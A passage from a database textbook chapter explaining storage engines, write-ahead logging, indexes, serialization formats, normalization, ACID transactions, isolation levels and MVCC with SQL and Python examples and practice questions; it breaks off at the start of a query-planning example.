The engine's job is harder than "write it to a file" because of three constraints. Disks favour sequential access (Chapter 2.1). Memory is far faster than disk but volatile. And a crash can happen between any two instructions, so committed data must still be there afterwards.
Every engine therefore has the same anatomy:
ANATOMY OF A STORAGE ENGINE
query executor
|
v
+----------------------+ buffer pool / page cache: hot pages in RAM,
| in-memory layer | so most reads never touch the disk
+----------------------+
| \
| flush \ every write first appends here, synchronously:
v v
+-----------+ +--------------------+
| data files| | write-ahead log | sequential, crash recovery
+-----------+ +--------------------+
|
v
background work: compaction, vacuum, checkpointing, index maintenance
The fundamental split between engine families is what a write costs. Update-in-place engines (B-tree family) find the right page and modify it, which makes reads cheap and predictable but writes random. Log-structured engines (LSM family) only ever append, which makes writes sequential and fast but pushes work into background compaction and makes reads consult several places.
# The same logical update, seen from each engine family.
# UPDATE-IN-PLACE (B-tree): locate, modify, write back
def update_in_place(key, value, tree, wal):
wal.append(("SET", key, value)) # durability first: sequential append
page = tree.find_leaf_page(key) # ~3-4 random reads to walk the tree
page.set(key, value) # mutate the page in memory
buffer_pool.mark_dirty(page) # flushed later at a checkpoint
# Reads afterwards: one tree walk. Simple and predictable.
# LOG-STRUCTURED (LSM): never modify, always append
def append_only(key, value, memtable, wal):
wal.append(("SET", key, value)) # same durability step
memtable[key] = value # sorted in-memory structure
if memtable.size > THRESHOLD:
flush_as_new_sorted_file(memtable) # one big sequential write
memtable.clear()
# Reads afterwards: check memtable, then each sorted file, newest first.
# Old versions of the key still exist on disk until compaction removes them.
| Engine | Family | Used by |
|---|---|---|
| InnoDB | B-tree | MySQL (default) |
| PostgreSQL heap + btree | B-tree (with MVCC heap) | PostgreSQL |
| WiredTiger | B-tree/LSM | MongoDB (default) |
| RocksDB / LevelDB | LSM | Many embedded and custom systems |
| Cassandra SSTables | LSM | Cassandra, ScyllaDB |
Two properties worth naming now because they recur throughout the chapter. Write amplification is the ratio of bytes actually written to disk versus bytes logically written by the application — compaction and page rewrites both inflate it. Read amplification is how many disk reads one logical lookup costs. Every engine trades one against the other, plus space amplification (how much disk the same logical data occupies).
Key Takeaways
- The storage engine, not the query language, determines performance characteristics.
- All engines share an anatomy: in-memory buffer, write-ahead log, data files, and background maintenance.
- The core split is update-in-place (B-tree) versus append-only (log-structured).
- Engines trade write, read, and space amplification against each other; there is no free configuration.
🧪 Practice
- For a workload of 90% reads on recent data, sketch which parts of the engine anatomy carry the load.
- Explain why every engine writes to a log before modifying data files.
- Interview: Two databases expose identical SQL but behave very differently under a write-heavy load. What explains it? (Hint: the difference is below the query layer, and it shows up in what a single write physically does.)
B-Trees vs. LSM Trees
This is the most consequential storage decision in the chapter, and it is essentially a question about your write pattern. Both structures keep data sorted so range queries work; they differ entirely in how they absorb changes.
A B-tree (specifically B+tree) is a balanced tree of fixed-size pages. All records live in leaf pages linked together for range scans, and internal pages hold only keys for navigation. Because the fan-out is huge — a 4 KB page holds hundreds of keys — even a billion rows sit about four levels deep, so any lookup is roughly four page reads, and typically fewer because upper levels stay cached. Updates modify the target page in place.
An LSM tree (log-structured merge tree) never modifies anything. Writes land in a sorted in-memory structure (the memtable); when it fills, it is flushed as an immutable sorted file (an SSTable). Reads check the memtable, then each SSTable from newest to oldest. Background compaction merges SSTables, discarding superseded values and tombstones.
B+TREE LSM TREE
[ 50 | 100 ] writes -> [ memtable (sorted, RAM) ]
/ | \ | flush
[10,30] [60,80] [120,150] L0: [SST][SST][SST] (may overlap)
| | | | compaction
leaves linked --> for range scans L1: [ SST ][ SST ] (non-overlapping)
| compaction
read : ~4 page reads, predictable L2: [ bigger SSTs ]
write: find page, modify IN PLACE
(random I/O) read : check memtable + N levels
write: append only (sequential I/O)
# Why LSM writes are fast and LSM reads need help.
def lsm_get(key, memtable, sstables, bloom_filters):
if key in memtable:
return memtable[key] # newest data, no disk I/O
for sst in sstables: # newest to oldest
# A Bloom filter answers "definitely not present" in O(1) from memory,
# skipping the disk read for most files. Without it, a lookup for a
# missing key would touch EVERY SSTable.
if not bloom_filters[sst].might_contain(key):
continue
value = sst.lookup(key) # binary search inside one file
if value is TOMBSTONE:
return None # deleted; do not look further
if value is not None:
return value # first hit wins: it is the newest
return None
| Dimension | B-tree | LSM tree |
|---|---|---|
| Write path | Random in-place page writes | Sequential appends |
| Write throughput | Lower | Much higher |
| Write amplification | Moderate (page + WAL) | Higher over time (repeated compaction) |
| Read (point lookup) | Predictable, ~4 reads | Variable: memtable + several levels |
| Read amplification | Low | Higher; mitigated by Bloom filters |
| Space amplification | Fragmentation, partly empty pages | Old versions until compaction |
| Range scans | Excellent (linked leaves) | Good (merge across sorted files) |
| Latency predictability | High | Compaction causes periodic spikes |
| Compression | Page-level, moderate | Better (large immutable sorted blocks) |
| Best for | Read-heavy, transactional, mixed | Write-heavy, time-series, logs |
A crucial operational note: deletes in an LSM are writes. Removing a key appends a tombstone, so a delete-heavy workload grows the dataset until compaction runs — and a range scan across many tombstones can be dramatically slower than the row count suggests.
The rule of thumb: B-tree unless writes dominate. Transactional systems, mixed workloads, and anything needing predictable p99 latency want a B-tree. Time series, event logs, metrics, and ingest-heavy pipelines want an LSM.
Key Takeaways
- B-trees update pages in place: predictable reads, random writes.
- LSM trees only append and compact in the background: fast sequential writes, variable reads.
- Bloom filters are what make LSM point lookups viable by skipping most files.
- LSM deletes are tombstone writes, and compaction causes periodic latency spikes.
🧪 Practice
- For each workload, pick an engine and justify it: banking ledger, IoT sensor ingest, product catalogue, application logs.
- Explain why an LSM range scan over a heavily deleted key range can be slow despite returning few rows.
- Interview: Your LSM-backed service has a good p50 and a terrible p99. What is likely happening and what would you tune? (Hint: think about what runs in the background and what it competes for.)
Write-Ahead Logging
A database must survive a crash at any instant, including halfway through updating a page. But writing data pages to disk on every commit would be unbearably slow — they are scattered across the file, so each commit becomes several random writes. Write-ahead logging resolves the conflict: make the durable write cheap and sequential, and let the organized write happen lazily.
The rule is in the name: before any change is applied to a data page, a description of that change is appended to a log and flushed to durable storage. Because the log is append-only, the flush is one sequential write, which is orders of magnitude cheaper than scattered page writes.
The analogy is a chef's order ticket rail. Tickets are written immediately in arrival order — cheap and sequential. The actual dishes are prepared in whatever order is efficient. If the kitchen catches fire, the tickets tell you exactly what was owed.
COMMIT PATH WITH A WAL
1. change pages in the buffer pool (RAM, fast, not yet durable)
2. append log records describing the change
3. fsync the log <- the ONLY synchronous disk write per commit
4. acknowledge the commit to the client
...later...
5. checkpoint: write dirty pages to the data files, sequentially and batched
6. log segments before the checkpoint can be recycled
CRASH RECOVERY
find last checkpoint -> REDO every logged change after it
-> UNDO changes from transactions that never committed
Result: exactly the committed state, nothing more, nothing less.
def commit(txn, wal, buffer_pool):
for change in txn.changes:
page = buffer_pool.get(change.page_id)
wal.append(LogRecord(lsn=next_lsn(), txn=txn.id, page=change.page_id,
before=page.snapshot(change.offset), # for UNDO
after=change.new_bytes)) # for REDO
page.apply(change)
buffer_pool.mark_dirty(page)
wal.append(LogRecord(txn=txn.id, type="COMMIT"))
wal.fsync() # THE durability barrier. Returning before this means
# acknowledging a commit that a power cut can erase.
return "committed" # data pages may still be dirty in RAM — that is fine,
# the log can reconstruct them.
The WAL is also the foundation for several features that appear later in this chapter, which is why it is worth understanding well:
| Feature | How the WAL enables it |
|---|---|
| Crash recovery | Replay committed changes, roll back uncommitted ones |
| Replication | Ship log records to replicas and replay them |
| Point-in-time recovery | Restore a backup, then replay the log to an instant |
| Change data capture | Read the log to emit a stream of row changes |
| Group commit | Batch many transactions into one fsync |
That last row is where most database write tuning happens. fsync costs
milliseconds, so engines batch concurrent commits into a single flush — raising
throughput enormously while adding a small latency floor. The dangerous knob is
the one that relaxes durability (innodb_flush_log_at_trx_commit=2,
synchronous_commit=off): it makes commits much faster by acknowledging before
the log is durable, which means a crash silently loses recently "committed"
transactions.
Key Takeaways
- Log the change before applying it; the log flush is the only synchronous write per commit.
- Sequential log appends are far cheaper than scattered data-page writes.
- Recovery replays committed changes after the last checkpoint and undoes uncommitted ones.
- The WAL also powers replication, PITR, and CDC — and relaxing its
fsynctrades durability for speed.
🧪 Practice
- Trace what happens on recovery if a crash occurs after step 3 but before step 5 in the commit path above.
- Explain group commit and why it improves throughput but not single-commit latency.
- Interview: A team sets
synchronous_commit=offto double write throughput. What exactly have they given up? (Hint: name the window of time and what a client was told during it.)
Indexes and Index Types
Without an index, answering "find the row where email = x" means reading every row — O(n) work that grows with the table. An index is a separate, ordered structure that maps values to row locations, turning that scan into a handful of page reads. It is the single highest-leverage performance tool in any database, and also the most commonly misapplied.
The cost side matters as much as the benefit. Every index must be updated on every insert, update, and delete of the indexed column, so indexes make writes slower and consume disk and memory. An unused index is pure overhead.
-- The order of columns in a composite index is not cosmetic. Think of it as
-- a phone book sorted by (last_name, first_name).
CREATE INDEX idx_orders_customer_created
ON orders (customer_id, created_at DESC);
-- USES the index fully: leftmost prefix present, sorted order matches
SELECT * FROM orders WHERE customer_id = 7 ORDER BY created_at DESC LIMIT 20;
-- USES the index partially: only the first column narrows the search
SELECT * FROM orders WHERE customer_id = 7;
-- CANNOT use it: skips the leftmost column, like searching a phone book by
-- first name only
SELECT * FROM orders WHERE created_at > '2026-01-01';
-- A covering index answers the query entirely from the index, never touching
-- the table ("index-only scan").
CREATE INDEX idx_orders_cover ON orders (customer_id, created_at) INCLUDE (total);
SELECT created_at, total FROM orders WHERE customer_id = 7;
-- Common mistakes that silently disable an index
SELECT * FROM users WHERE lower(email) = 'a@b.com'; -- function on the column
CREATE INDEX idx_users_email_lower ON users (lower(email)); -- fix: index the expression
SELECT * FROM events WHERE user_id::text = '7'; -- implicit cast
SELECT * FROM logs WHERE message LIKE '%timeout%'; -- leading wildcard: no B-tree help
-- fix: a full-text or trigram index
| Index type | Structure | Good for |
|---|---|---|
| B-tree | Balanced tree | Equality, ranges, sorting, prefix matches — the default |
| Hash | Hash table | Equality only; no ranges, no ordering |
| Bitmap | Bit per row per value | Low-cardinality columns in analytics |
| GiST / R-tree | Spatial tree | Geometry, ranges, nearest-neighbour |
| GIN / inverted | Term to row list | Full text, arrays, JSON containment |
| Trigram | 3-character grams | Fuzzy and substring matching |
| Partial | B-tree on a subset | WHERE status = 'active' — smaller and cheaper |
| Clustered | Table stored in index order | Range scans on the clustering key |
Two structural distinctions worth knowing. A clustered index determines the physical row order, so there can be only one, and range scans on it are sequential (InnoDB clusters on the primary key; PostgreSQL does not cluster by default). A secondary index stores a pointer to the row, so using it costs an extra lookup — unless the index covers the query.
Practical guidance: index the columns in WHERE, JOIN, and ORDER BY clauses
of your actual slow queries; prefer a few well-ordered composite indexes over
many single-column ones; and periodically drop indexes the database reports as
unused.
Key Takeaways
- Indexes turn scans into lookups but slow every write and consume space.
- Composite index column order matters: only a leftmost prefix can be used.
- Covering indexes answer a query without touching the table.
- Functions, casts, and leading wildcards on an indexed column silently disable the index.
🧪 Practice
- Design indexes for a query filtering on
tenant_idandstatus, sorted bycreated_at, returningidandtitle.- Explain why
WHERE lower(email) = ?misses an index on- Interview: A table has 12 indexes and writes are slow. How do you decide which to drop? (Hint: the database itself records something that answers this — and you also need to know which queries are actually hot.)
Data Serialization Formats
Every time data leaves a process — over a network, into a queue, onto disk — it
must be converted to bytes and back. That choice affects payload size, CPU cost,
schema evolution, and whether a human can debug it with cat. Because stored
data outlives the code that wrote it, serialization is a long-term commitment.
The formats divide along two axes: text versus binary, and schemaless versus schema-driven.
schemaless schema-driven
+---------------------+---------------------------+
text | JSON, XML, CSV | JSON + JSON Schema |
| human-readable | validated, still verbose |
+---------------------+---------------------------+
binary | MessagePack, BSON | Protobuf, Avro, Thrift |
| compact, opaque | compact, evolvable, typed|
+---------------------+---------------------------+
# The same record in four formats — note size and what each carries.
record = {"id": 42, "name": "Ada", "active": True, "score": 99.5}
# JSON: 49 bytes, self-describing, universally readable
b'{"id":42,"name":"Ada","active":true,"score":99.5}'
# MessagePack: 37 bytes, binary but still self-describing (keys included)
b'\x84\xa2id*\xa4name\xa3Ada\xa6active\xc3\xa5score\xcb@X\xe0\x00\x00\x00\x00\x00'
# Protobuf: 18 bytes, field NUMBERS instead of names; needs the schema to read
b'\x08*\x12\x03Ada\x18\x01!\x00\x00\x00\x00\x00\xe0X@'
# Avro: similar size to Protobuf, but the schema travels with the file (once
# per file, not per record) — ideal for large batches in a data lake.
| Format | Size | Speed | Human-readable | Schema | Evolution |
|---|---|---|---|---|---|
| JSON | Large | Slow | Yes | Optional | Convention only |
| XML | Largest | Slowest | Yes | XSD | Verbose but formal |
| CSV | Small | Fast | Yes | None | Fragile (column order) |
| MessagePack | Medium | Fast | No | None | Same as JSON |
| Protobuf | Small | Fastest | No | Required | Field numbers (Chapter 3) |
| Avro | Small | Fast | No | Required | Reader/writer resolution |
| Parquet | Smallest (columnar) | Fast for scans | No | Required | Column-level |
Parquet deserves separate mention because it is columnar: values of the same column are stored together, so an analytical query reading 3 of 50 columns reads only those 3, and similar values compress far better. That is why analytics stores use it and transactional databases do not — row-oriented storage wins when you need whole records.
ROW-ORIENTED (OLTP) COLUMNAR (OLAP)
[id|name|score][id|name|score] [id,id,id,...][name,name,...][score,...]
"give me row 42" -> 1 read "average score of 10M rows"
"average of scores" -> read all -> read ONE column, highly compressed
Practical guidance: JSON for public APIs and anything a human debugs; Protobuf or Avro for internal high-volume traffic and long-lived stored events; Parquet for analytical data at rest. And whichever you choose, decide the evolution strategy before the first record is written (Chapter 3.3).
Key Takeaways
- Serialization choice governs payload size, CPU, evolvability, and debuggability.
- Text formats are readable and verbose; binary schema-driven formats are compact and evolvable.
- Columnar formats like Parquet win for analytics because queries read only the columns they need.
- Stored data outlives its writer — decide schema evolution before writing the first record.
🧪 Practice
- Estimate the storage difference between 1 billion events at 300 bytes of JSON versus 90 bytes of Protobuf.
- Explain why Parquet compresses better than row-oriented storage for the same data.
- Interview: You are choosing a format for events retained seven years. What matters most? (Hint: the code that reads them in year six does not exist yet — what must be true for it to succeed?)
<a id="42-relational-databases"></a>
4.2 Relational Databases
Relational databases remain the default for transactional data because they combine a declarative query language with correctness guarantees that are expensive to rebuild by hand.
Schema Design and Normalization
Store the same fact in two places and, sooner or later, the two copies will disagree. Normalization is the systematic prevention of that outcome: organize data so every fact lives in exactly one place, and inconsistency becomes structurally impossible rather than something you police with application code.
The problems normalization eliminates have names. An update anomaly is changing a customer's address in three of four rows. An insertion anomaly is being unable to record a product because no order references it yet. A deletion anomaly is losing a supplier's phone number because the last order from them was deleted.
UNNORMALIZED: one wide table, facts repeated
order_id | customer_name | customer_email | product | price | qty
---------|---------------|----------------|-----------|-------|----
1 | Ada Lovelace | ada@ex.com | Lamp | 29.00 | 2
2 | Ada Lovelace | ada@ex.com | Desk | 199.00| 1
3 | Ada Lovelace | ada@exam.com | Chair | 89.00 | 1 <- drifted!
NORMALIZED: each fact in exactly one place
customers orders order_items
id | name | email id | customer_id | date order_id | product_id | qty | price
7 | Ada | ada@... 1 | 7 | ... 1 | 12 | 2 | 29.00
^ price captured at purchase time:
a genuinely different fact from
the product's CURRENT price
The normal forms are a progression, and the first three cover almost all practical cases:
| Form | Requirement | Plain-language rule |
|---|---|---|
| 1NF | Atomic values; no repeating groups | No comma-separated lists in a column |
| 2NF | 1NF + no partial dependency on part of a composite key | Every column depends on the whole key |
| 3NF | 2NF + no transitive dependencies | Non-key columns must not depend on each other |
| BCNF | Stricter 3NF for overlapping candidate keys | Every determinant is a candidate key |
-- 1NF violation: a list stuffed into one column
CREATE TABLE users (id INT, tags TEXT); -- tags = 'admin,beta,eu'
-- Cannot index, cannot join, cannot count reliably.
-- 3NF violation: zip determines city, so city depends on a non-key column
CREATE TABLE addresses (id INT PRIMARY KEY, zip TEXT, city TEXT);
-- Normalized, with the constraints that make correctness the database's job
CREATE TABLE customers (
id BIGSERIAL PRIMARY KEY,
email CITEXT NOT NULL UNIQUE, -- uniqueness enforced here,
name TEXT NOT NULL -- not by a racy app-side check
);
CREATE TABLE orders (
id BIGSERIAL PRIMARY KEY,
customer_id BIGINT NOT NULL REFERENCES customers(id) ON DELETE RESTRICT,
status TEXT NOT NULL CHECK (status IN ('pending','paid','cancelled')),
created_at TIMESTAMPTZ NOT NULL DEFAULT now()
);
CREATE TABLE order_items (
order_id BIGINT NOT NULL REFERENCES orders(id) ON DELETE CASCADE,
product_id BIGINT NOT NULL REFERENCES products(id),
qty INT NOT NULL CHECK (qty > 0),
unit_price NUMERIC(12,2) NOT NULL, -- historical price, not a copy
PRIMARY KEY (order_id, product_id) -- natural composite key
);
Constraints deserve emphasis. A UNIQUE constraint is not a duplicate of an
application check — it is the only version that holds under concurrency, because
two simultaneous requests can both pass a SELECT ... WHERE email = ? check and
then both insert. Foreign keys, CHECK constraints, and NOT NULL work the same
way: they are correctness guarantees the database enforces even when application
code has bugs.
Also decide money and time representation once, at schema design time: use exact
NUMERIC/DECIMAL for money (never FLOAT, which cannot represent 0.10
exactly) and TIMESTAMPTZ in UTC for instants.
Key Takeaways
- Normalization puts every fact in one place, making update, insert, and delete anomalies impossible.
- 3NF covers nearly all practical cases: every non-key column depends on the key, the whole key, and nothing but the key.
- Constraints (
UNIQUE, foreign keys,CHECK) are concurrency-safe guarantees that application checks are not.- Historical values like purchase price are distinct facts, not denormalized copies.
🧪 Practice
- Normalize a spreadsheet-style table of
employee, department, dept_manager, project, hoursto 3NF and name the anomalies you removed.- Explain why an application-level uniqueness check is unsafe and write the constraint that fixes it.
- Interview: When is storing a product's price on the order line not denormalization? (Hint: ask whether the two values can ever legitimately differ, and what each one means.)
Denormalization Trade-offs
Normalization optimizes for write correctness; it can be hostile to read performance. A fully normalized schema may require joining six tables to render one screen, and at high read volume those joins become the bottleneck. Denormalization deliberately reintroduces redundancy to make reads cheaper — trading write complexity and consistency risk for read speed.
The essential framing: denormalization is not "bad normalization", it is a cache stored inside your database, and it has all the problems caches have. Every redundant copy must be kept in sync, and the cost of that synchronization is what you are buying read speed with.
-- Normalized: correct, but a hot query has to aggregate on every read
SELECT p.id, p.title,
count(c.id) AS comment_count, -- recomputed for every page view
avg(r.rating) AS avg_rating
FROM posts p
LEFT JOIN comments c ON c.post_id = p.id
LEFT JOIN ratings r ON r.post_id = p.id
GROUP BY p.id
ORDER BY p.created_at DESC
LIMIT 20; -- scans all comments and ratings
-- Denormalized: counters maintained on write, so reads are a single-table scan
ALTER TABLE posts
ADD COLUMN comment_count INT NOT NULL DEFAULT 0,
ADD COLUMN rating_sum INT NOT NULL DEFAULT 0,
ADD COLUMN rating_count INT NOT NULL DEFAULT 0;
SELECT id, title, comment_count,
CASE WHEN rating_count > 0
THEN rating_sum::numeric / rating_count END AS avg_rating
FROM posts ORDER BY created_at DESC LIMIT 20; -- no joins, no aggregation
-- Keeping the copy correct is the entire cost. Update it in the SAME
-- transaction as the source of truth, or the two will drift.
BEGIN;
INSERT INTO comments (post_id, author_id, body) VALUES (42, 7, 'Nice');
UPDATE posts SET comment_count = comment_count + 1 WHERE id = 42;
COMMIT;
-- Two consequences to accept knowingly:
-- 1. Every comment insert now contends on the posts row (a hotspot for a
-- viral post — see 4.5 on hotspots).
-- 2. Any path that deletes comments without this update silently corrupts
-- the counter, so a periodic reconciliation job is mandatory.
| Technique | What it duplicates | Sync mechanism |
|---|---|---|
| Counter column | An aggregate | Same-transaction update; periodic reconciliation |
| Duplicated attribute | A parent's column on the child | Trigger or application write path |
| Precomputed join table | A whole join result | Batch or event-driven rebuild |
| Materialized view | A query result | Database-managed refresh |
| Read model (CQRS) | An entire query-optimized store | Event stream (Chapter 10.3) |
The decision checklist:
- Measure first. Denormalize a query you have proven is slow, not one you suspect might be.
- Prefer reversible forms. A materialized view can be dropped and rebuilt; a duplicated column scattered through application code cannot.
- Always have a reconciliation job. Redundant data drifts — the question is only whether you detect it before your users do.
- Keep the source of truth unambiguous. Every derived value must have exactly one authoritative origin.
Key Takeaways
- Denormalization buys read speed with write complexity and consistency risk.
- It is a cache inside the database, with all the invalidation problems that implies.
- Update derived values in the same transaction, and run periodic reconciliation regardless.
- Prefer database-managed forms (materialized views) over hand-maintained copies.
🧪 Practice
- Add a denormalized
last_message_atto a conversations table and list every write path that must maintain it.- Write a reconciliation query that detects drift in a
comment_countcolumn.- Interview: A counter column on a viral post becomes a write hotspot. How do you fix it without giving up fast reads? (Hint: the contention is on one row — consider spreading the write and merging on read.)
ACID Properties
A transaction is a group of operations that must succeed or fail as a unit. Without that guarantee, a transfer between two accounts can debit one and never credit the other, and no amount of careful application code fully closes the gap, because crashes and concurrency do not respect your control flow. ACID names the four guarantees that make transactions trustworthy.
Atomicity — all operations commit or none do. Consistency — the database moves from one valid state to another, respecting every declared constraint. Isolation — concurrent transactions do not observe each other's partial work. Durability — once committed, it survives a crash.
Note that these are different guarantees with different implementations: atomicity and durability come from the write-ahead log, isolation from locking or MVCC, and consistency from constraints plus the other three.
A TRANSFER WITHOUT ATOMICITY
UPDATE accounts SET balance = balance - 100 WHERE id = 1; -- succeeds
*** crash ***
UPDATE accounts SET balance = balance + 100 WHERE id = 2; -- never runs
Result: 100 units destroyed. No retry can detect this reliably, because the
process that knew what it was doing is gone.
WITH ATOMICITY
BEGIN; ...both updates...; COMMIT;
A crash before COMMIT -> recovery rolls both back. A crash after COMMIT ->
recovery replays both. There is no in-between state to observe.
def transfer(conn, from_id, to_id, amount):
with conn.transaction(): # BEGIN ... COMMIT/ROLLBACK
# A: both updates or neither
rows = conn.execute(
"UPDATE accounts SET balance = balance - %s "
"WHERE id = %s AND balance >= %s", # C: the CHECK is in the WHERE
(amount, from_id, amount))
if rows.rowcount == 0:
raise InsufficientFunds() # rollback: nothing happened
conn.execute("UPDATE accounts SET balance = balance + %s WHERE id = %s",
(amount, to_id))
# I: another transaction reading these rows sees either the pre- or
# post-state, never one update without the other.
# D: the commit returns only after the WAL is fsynced.
# The classic mistake: doing the arithmetic in application code.
# bal = SELECT balance ... <- read
# UPDATE ... SET balance = bal-100 <- write based on a stale read
# Two concurrent transfers both read 500, both write 400, and 100 units appear
# from nowhere. Let the database do the arithmetic, or lock the row explicitly.
| Property | Guarantees | Implemented by | Failure if absent |
|---|---|---|---|
| Atomicity | All or nothing | WAL undo, rollback | Partial updates, orphaned rows |
| Consistency | Constraints always hold | Constraints + A, I, D | Invalid states (negative stock) |
| Isolation | Concurrent transactions do not interfere | Locking or MVCC | Dirty/phantom reads, lost updates |
| Durability | Commits survive crashes | WAL fsync, replication | Acknowledged data disappears |
Two caveats that matter in system design. Isolation is the property most often weakened deliberately for performance — the next topic covers exactly how much you give up. And ACID is a guarantee about one database; spanning several services or shards requires the distributed techniques in Chapter 8.5 (two-phase commit, sagas, outbox), which are strictly weaker and much more complex.
Key Takeaways
- Atomicity and durability come from the WAL; isolation from locking or MVCC; consistency from constraints plus the others.
- Perform arithmetic inside the database or under an explicit lock — never on a stale application-side read.
- Isolation is the property routinely traded away for throughput.
- ACID applies within one database; crossing service or shard boundaries needs different, weaker machinery.
🧪 Practice
- Show a concrete interleaving where two concurrent read-modify-write transfers lose an update, and fix it two different ways.
- Which ACID property does each prevent: a
NOT NULLviolation, reading uncommitted data, losing a commit to a power cut, a half-completed transfer?- Interview: Why can't you get full ACID across two microservices with separate databases? (Hint: consider what a commit would have to coordinate and what happens when one participant becomes unreachable mid-decision.)
Transaction Isolation Levels
Perfect isolation means transactions behave as if they ran one at a time. That is correct and slow — serial execution wastes the concurrency modern hardware offers. So databases provide a dial, and the levels on that dial are defined by which specific anomalies they permit.
Knowing the anomalies by name is what makes the dial usable:
| Anomaly | What happens |
|---|---|
| Dirty read | You read data another transaction wrote but has not committed |
| Non-repeatable read | You read the same row twice and get different values |
| Phantom read | You run the same query twice and new rows appear |
| Lost update | Two read-modify-write cycles overlap; one update vanishes |
| Write skew | Both transactions read a shared state, then each writes based on it, breaking an invariant neither violated alone |
THE FOUR STANDARD LEVELS
dirty non-repeatable phantom write
read read read skew
READ UNCOMMITTED yes yes yes yes
READ COMMITTED no yes yes yes
REPEATABLE READ no no yes* yes
SERIALIZABLE no no no no
* PostgreSQL's REPEATABLE READ (snapshot isolation) also prevents phantoms,
but still allows write skew. MySQL InnoDB prevents phantoms with gap locks.
Defaults differ: PostgreSQL and Oracle -> READ COMMITTED; MySQL -> REPEATABLE READ.
Write skew is the one that surprises people, because every transaction looks individually correct:
-- Invariant: at least one doctor must remain on call.
-- Two doctors, both on call, both try to go off call simultaneously.
-- Transaction A -- Transaction B
BEGIN; BEGIN;
SELECT count(*) FROM oncall SELECT count(*) FROM oncall
WHERE on_call = true; -- sees 2 WHERE on_call = true; -- sees 2
-- "2 > 1, safe to leave" -- "2 > 1, safe to leave"
UPDATE oncall SET on_call = false UPDATE oncall SET on_call = false
WHERE doctor_id = 1; WHERE doctor_id = 2;
COMMIT; COMMIT;
-- Result: zero doctors on call. Neither transaction saw the other's write,
-- and each preserved the invariant against the state it saw.
-- FIX 1: SERIALIZABLE — the database detects the conflict and aborts one
BEGIN ISOLATION LEVEL SERIALIZABLE; ... -- application must retry on failure
-- FIX 2: materialize the conflict with an explicit lock
SELECT count(*) FROM oncall WHERE on_call = true FOR UPDATE; -- serializes them
# SERIALIZABLE moves the burden to the application: transactions can now fail
# with a serialization error, and retrying is mandatory, not optional.
def run_serializable(conn, fn, attempts=3):
for attempt in range(attempts):
try:
with conn.transaction(isolation="SERIALIZABLE"):
return fn(conn)
except SerializationFailure: # e.g. PostgreSQL SQLSTATE 40001
if attempt == attempts - 1:
raise
time.sleep(0.05 * 2 ** attempt) # backoff; the retry usually succeeds
Practical guidance: READ COMMITTED for most workloads, with explicit
SELECT ... FOR UPDATE on the specific rows whose invariants matter. Reach for
SERIALIZABLE when correctness rules span multiple rows in ways that are hard to
lock precisely — and only if every transaction path has a retry loop.
Key Takeaways
- Isolation levels are defined by which anomalies they permit, not by how they are implemented.
- Defaults differ by database — know yours;
READ COMMITTEDandREPEATABLE READare both common.- Write skew survives snapshot isolation and is invisible in single-transaction review.
SERIALIZABLErequires application retry logic; without it you have swapped silent corruption for visible failures nobody handles.
🧪 Practice
- Construct an interleaving that produces a non-repeatable read, then show which level prevents it.
- Write the booking logic for "a meeting room cannot be double-booked" at
READ COMMITTED, using explicit locking.- Interview: Your service intermittently violates a business rule that every code path appears to enforce. What do you suspect? (Hint: consider what two correct transactions can do together that neither does alone.)
Locking and MVCC
Isolation levels describe what you get; locking and MVCC are how databases deliver it. The two approaches embody opposite philosophies, and knowing which one your database uses explains most of its concurrency behaviour.
Locking (pessimistic) assumes conflict: acquire a lock before touching data, and make everyone else wait. It is simple and correct, but readers block writers and writers block readers, so throughput collapses under contention and deadlocks become possible.
MVCC (Multi-Version Concurrency Control, optimistic) keeps multiple versions of each row. A writer creates a new version rather than overwriting, and each transaction reads the version that was current when it started. The headline consequence: readers never block writers, and writers never block readers. This is why PostgreSQL, Oracle, MySQL InnoDB, and most modern engines use it.
MVCC: EACH ROW IS A CHAIN OF VERSIONS
row id=42 [v1 balance=500, xmin=100, xmax=105] <- superseded by txn 105
[v2 balance=400, xmin=105, xmax=null] <- current
Txn 103 (started before 105 committed) reads v1: 500
Txn 107 (started after) reads v2: 400
Neither waits for the other. The cost: old versions accumulate and must be
cleaned up (PostgreSQL VACUUM, InnoDB purge). Neglect that and you get
table bloat and, in Postgres, transaction-id wraparound danger.
-- PESSIMISTIC: take the lock, then act. Correct under contention, but holds
-- the lock for the whole transaction — keep it short and never do I/O inside.
BEGIN;
SELECT stock FROM products WHERE id = 42 FOR UPDATE; -- row lock acquired
UPDATE products SET stock = stock - 1 WHERE id = 42;
COMMIT; -- lock released
-- OPTIMISTIC: no lock; detect conflict at write time using a version column.
-- Best when conflicts are rare — no waiting in the common case.
UPDATE products
SET stock = stock - 1, version = version + 1
WHERE id = 42 AND version = 7; -- 0 rows affected => someone else won
-- The application checks rowcount and retries with a fresh read.
-- Avoiding deadlocks: two transactions locking the same rows in OPPOSITE order
-- will deadlock. The fix is a global ordering rule.
SELECT * FROM accounts WHERE id IN (1, 2) ORDER BY id FOR UPDATE;
-- ^ always lock in ascending id order
| Aspect | Pessimistic locking | MVCC / optimistic |
|---|---|---|
| Conflict handling | Prevent by waiting | Detect at commit, retry |
| Readers vs. writers | Block each other | Never block each other |
| Throughput, low contention | Lower (lock overhead) | Higher |
| Throughput, high contention | Predictable | Retry storms possible |
| Deadlocks | Yes; needs lock ordering | No deadlocks, but aborts |
| Storage cost | None | Old versions until cleanup |
| Application burden | None | Must handle retries |
Two operational consequences follow directly from MVCC. Long-running
transactions are dangerous: an idle transaction left open holds back cleanup of
every version newer than its snapshot, bloating tables across the whole database.
And SELECT ... FOR UPDATE still exists in MVCC systems — you need it
whenever a read informs a write, because MVCC's snapshot alone does not prevent
lost updates.
Key Takeaways
- Locking prevents conflicts by waiting; MVCC allows concurrency and detects conflicts.
- Under MVCC, readers never block writers and writers never block readers.
- MVCC's cost is version accumulation — vacuum/purge must keep up, and long idle transactions block it.
- Use
FOR UPDATEwhen a read decides a write, and always acquire multiple locks in a consistent order.
🧪 Practice
- Show a two-transaction interleaving that deadlocks, then rewrite it with a lock-ordering rule that cannot.
- Implement optimistic concurrency with a
versioncolumn, including the retry path.- Interview: A monitoring dashboard opens a transaction and leaves it idle for hours. What breaks and why? (Hint: think about what the database must keep around in case that transaction reads again.)
Query Planning and Optimization
SQL is declarative: you state the result you want, not how to compute it. The query planner turns that statement into an execution strategy, and for any non-trivial query there are many possible strategies whose costs differ by orders of magnitude. Understanding the planner is what turns "the database is slow" into a specific, fixable problem.
The planner estimates cost from statistics — row counts, value distributions, and index selectivity — collected by background sampling. Its estimates are usually good, and when they are wrong it is almost always because statistics are stale or the data is skewed.
-- ALWAYS read the actual plan rather than guessing.
EXPLAIN (ANALYZE, BUFFERS)
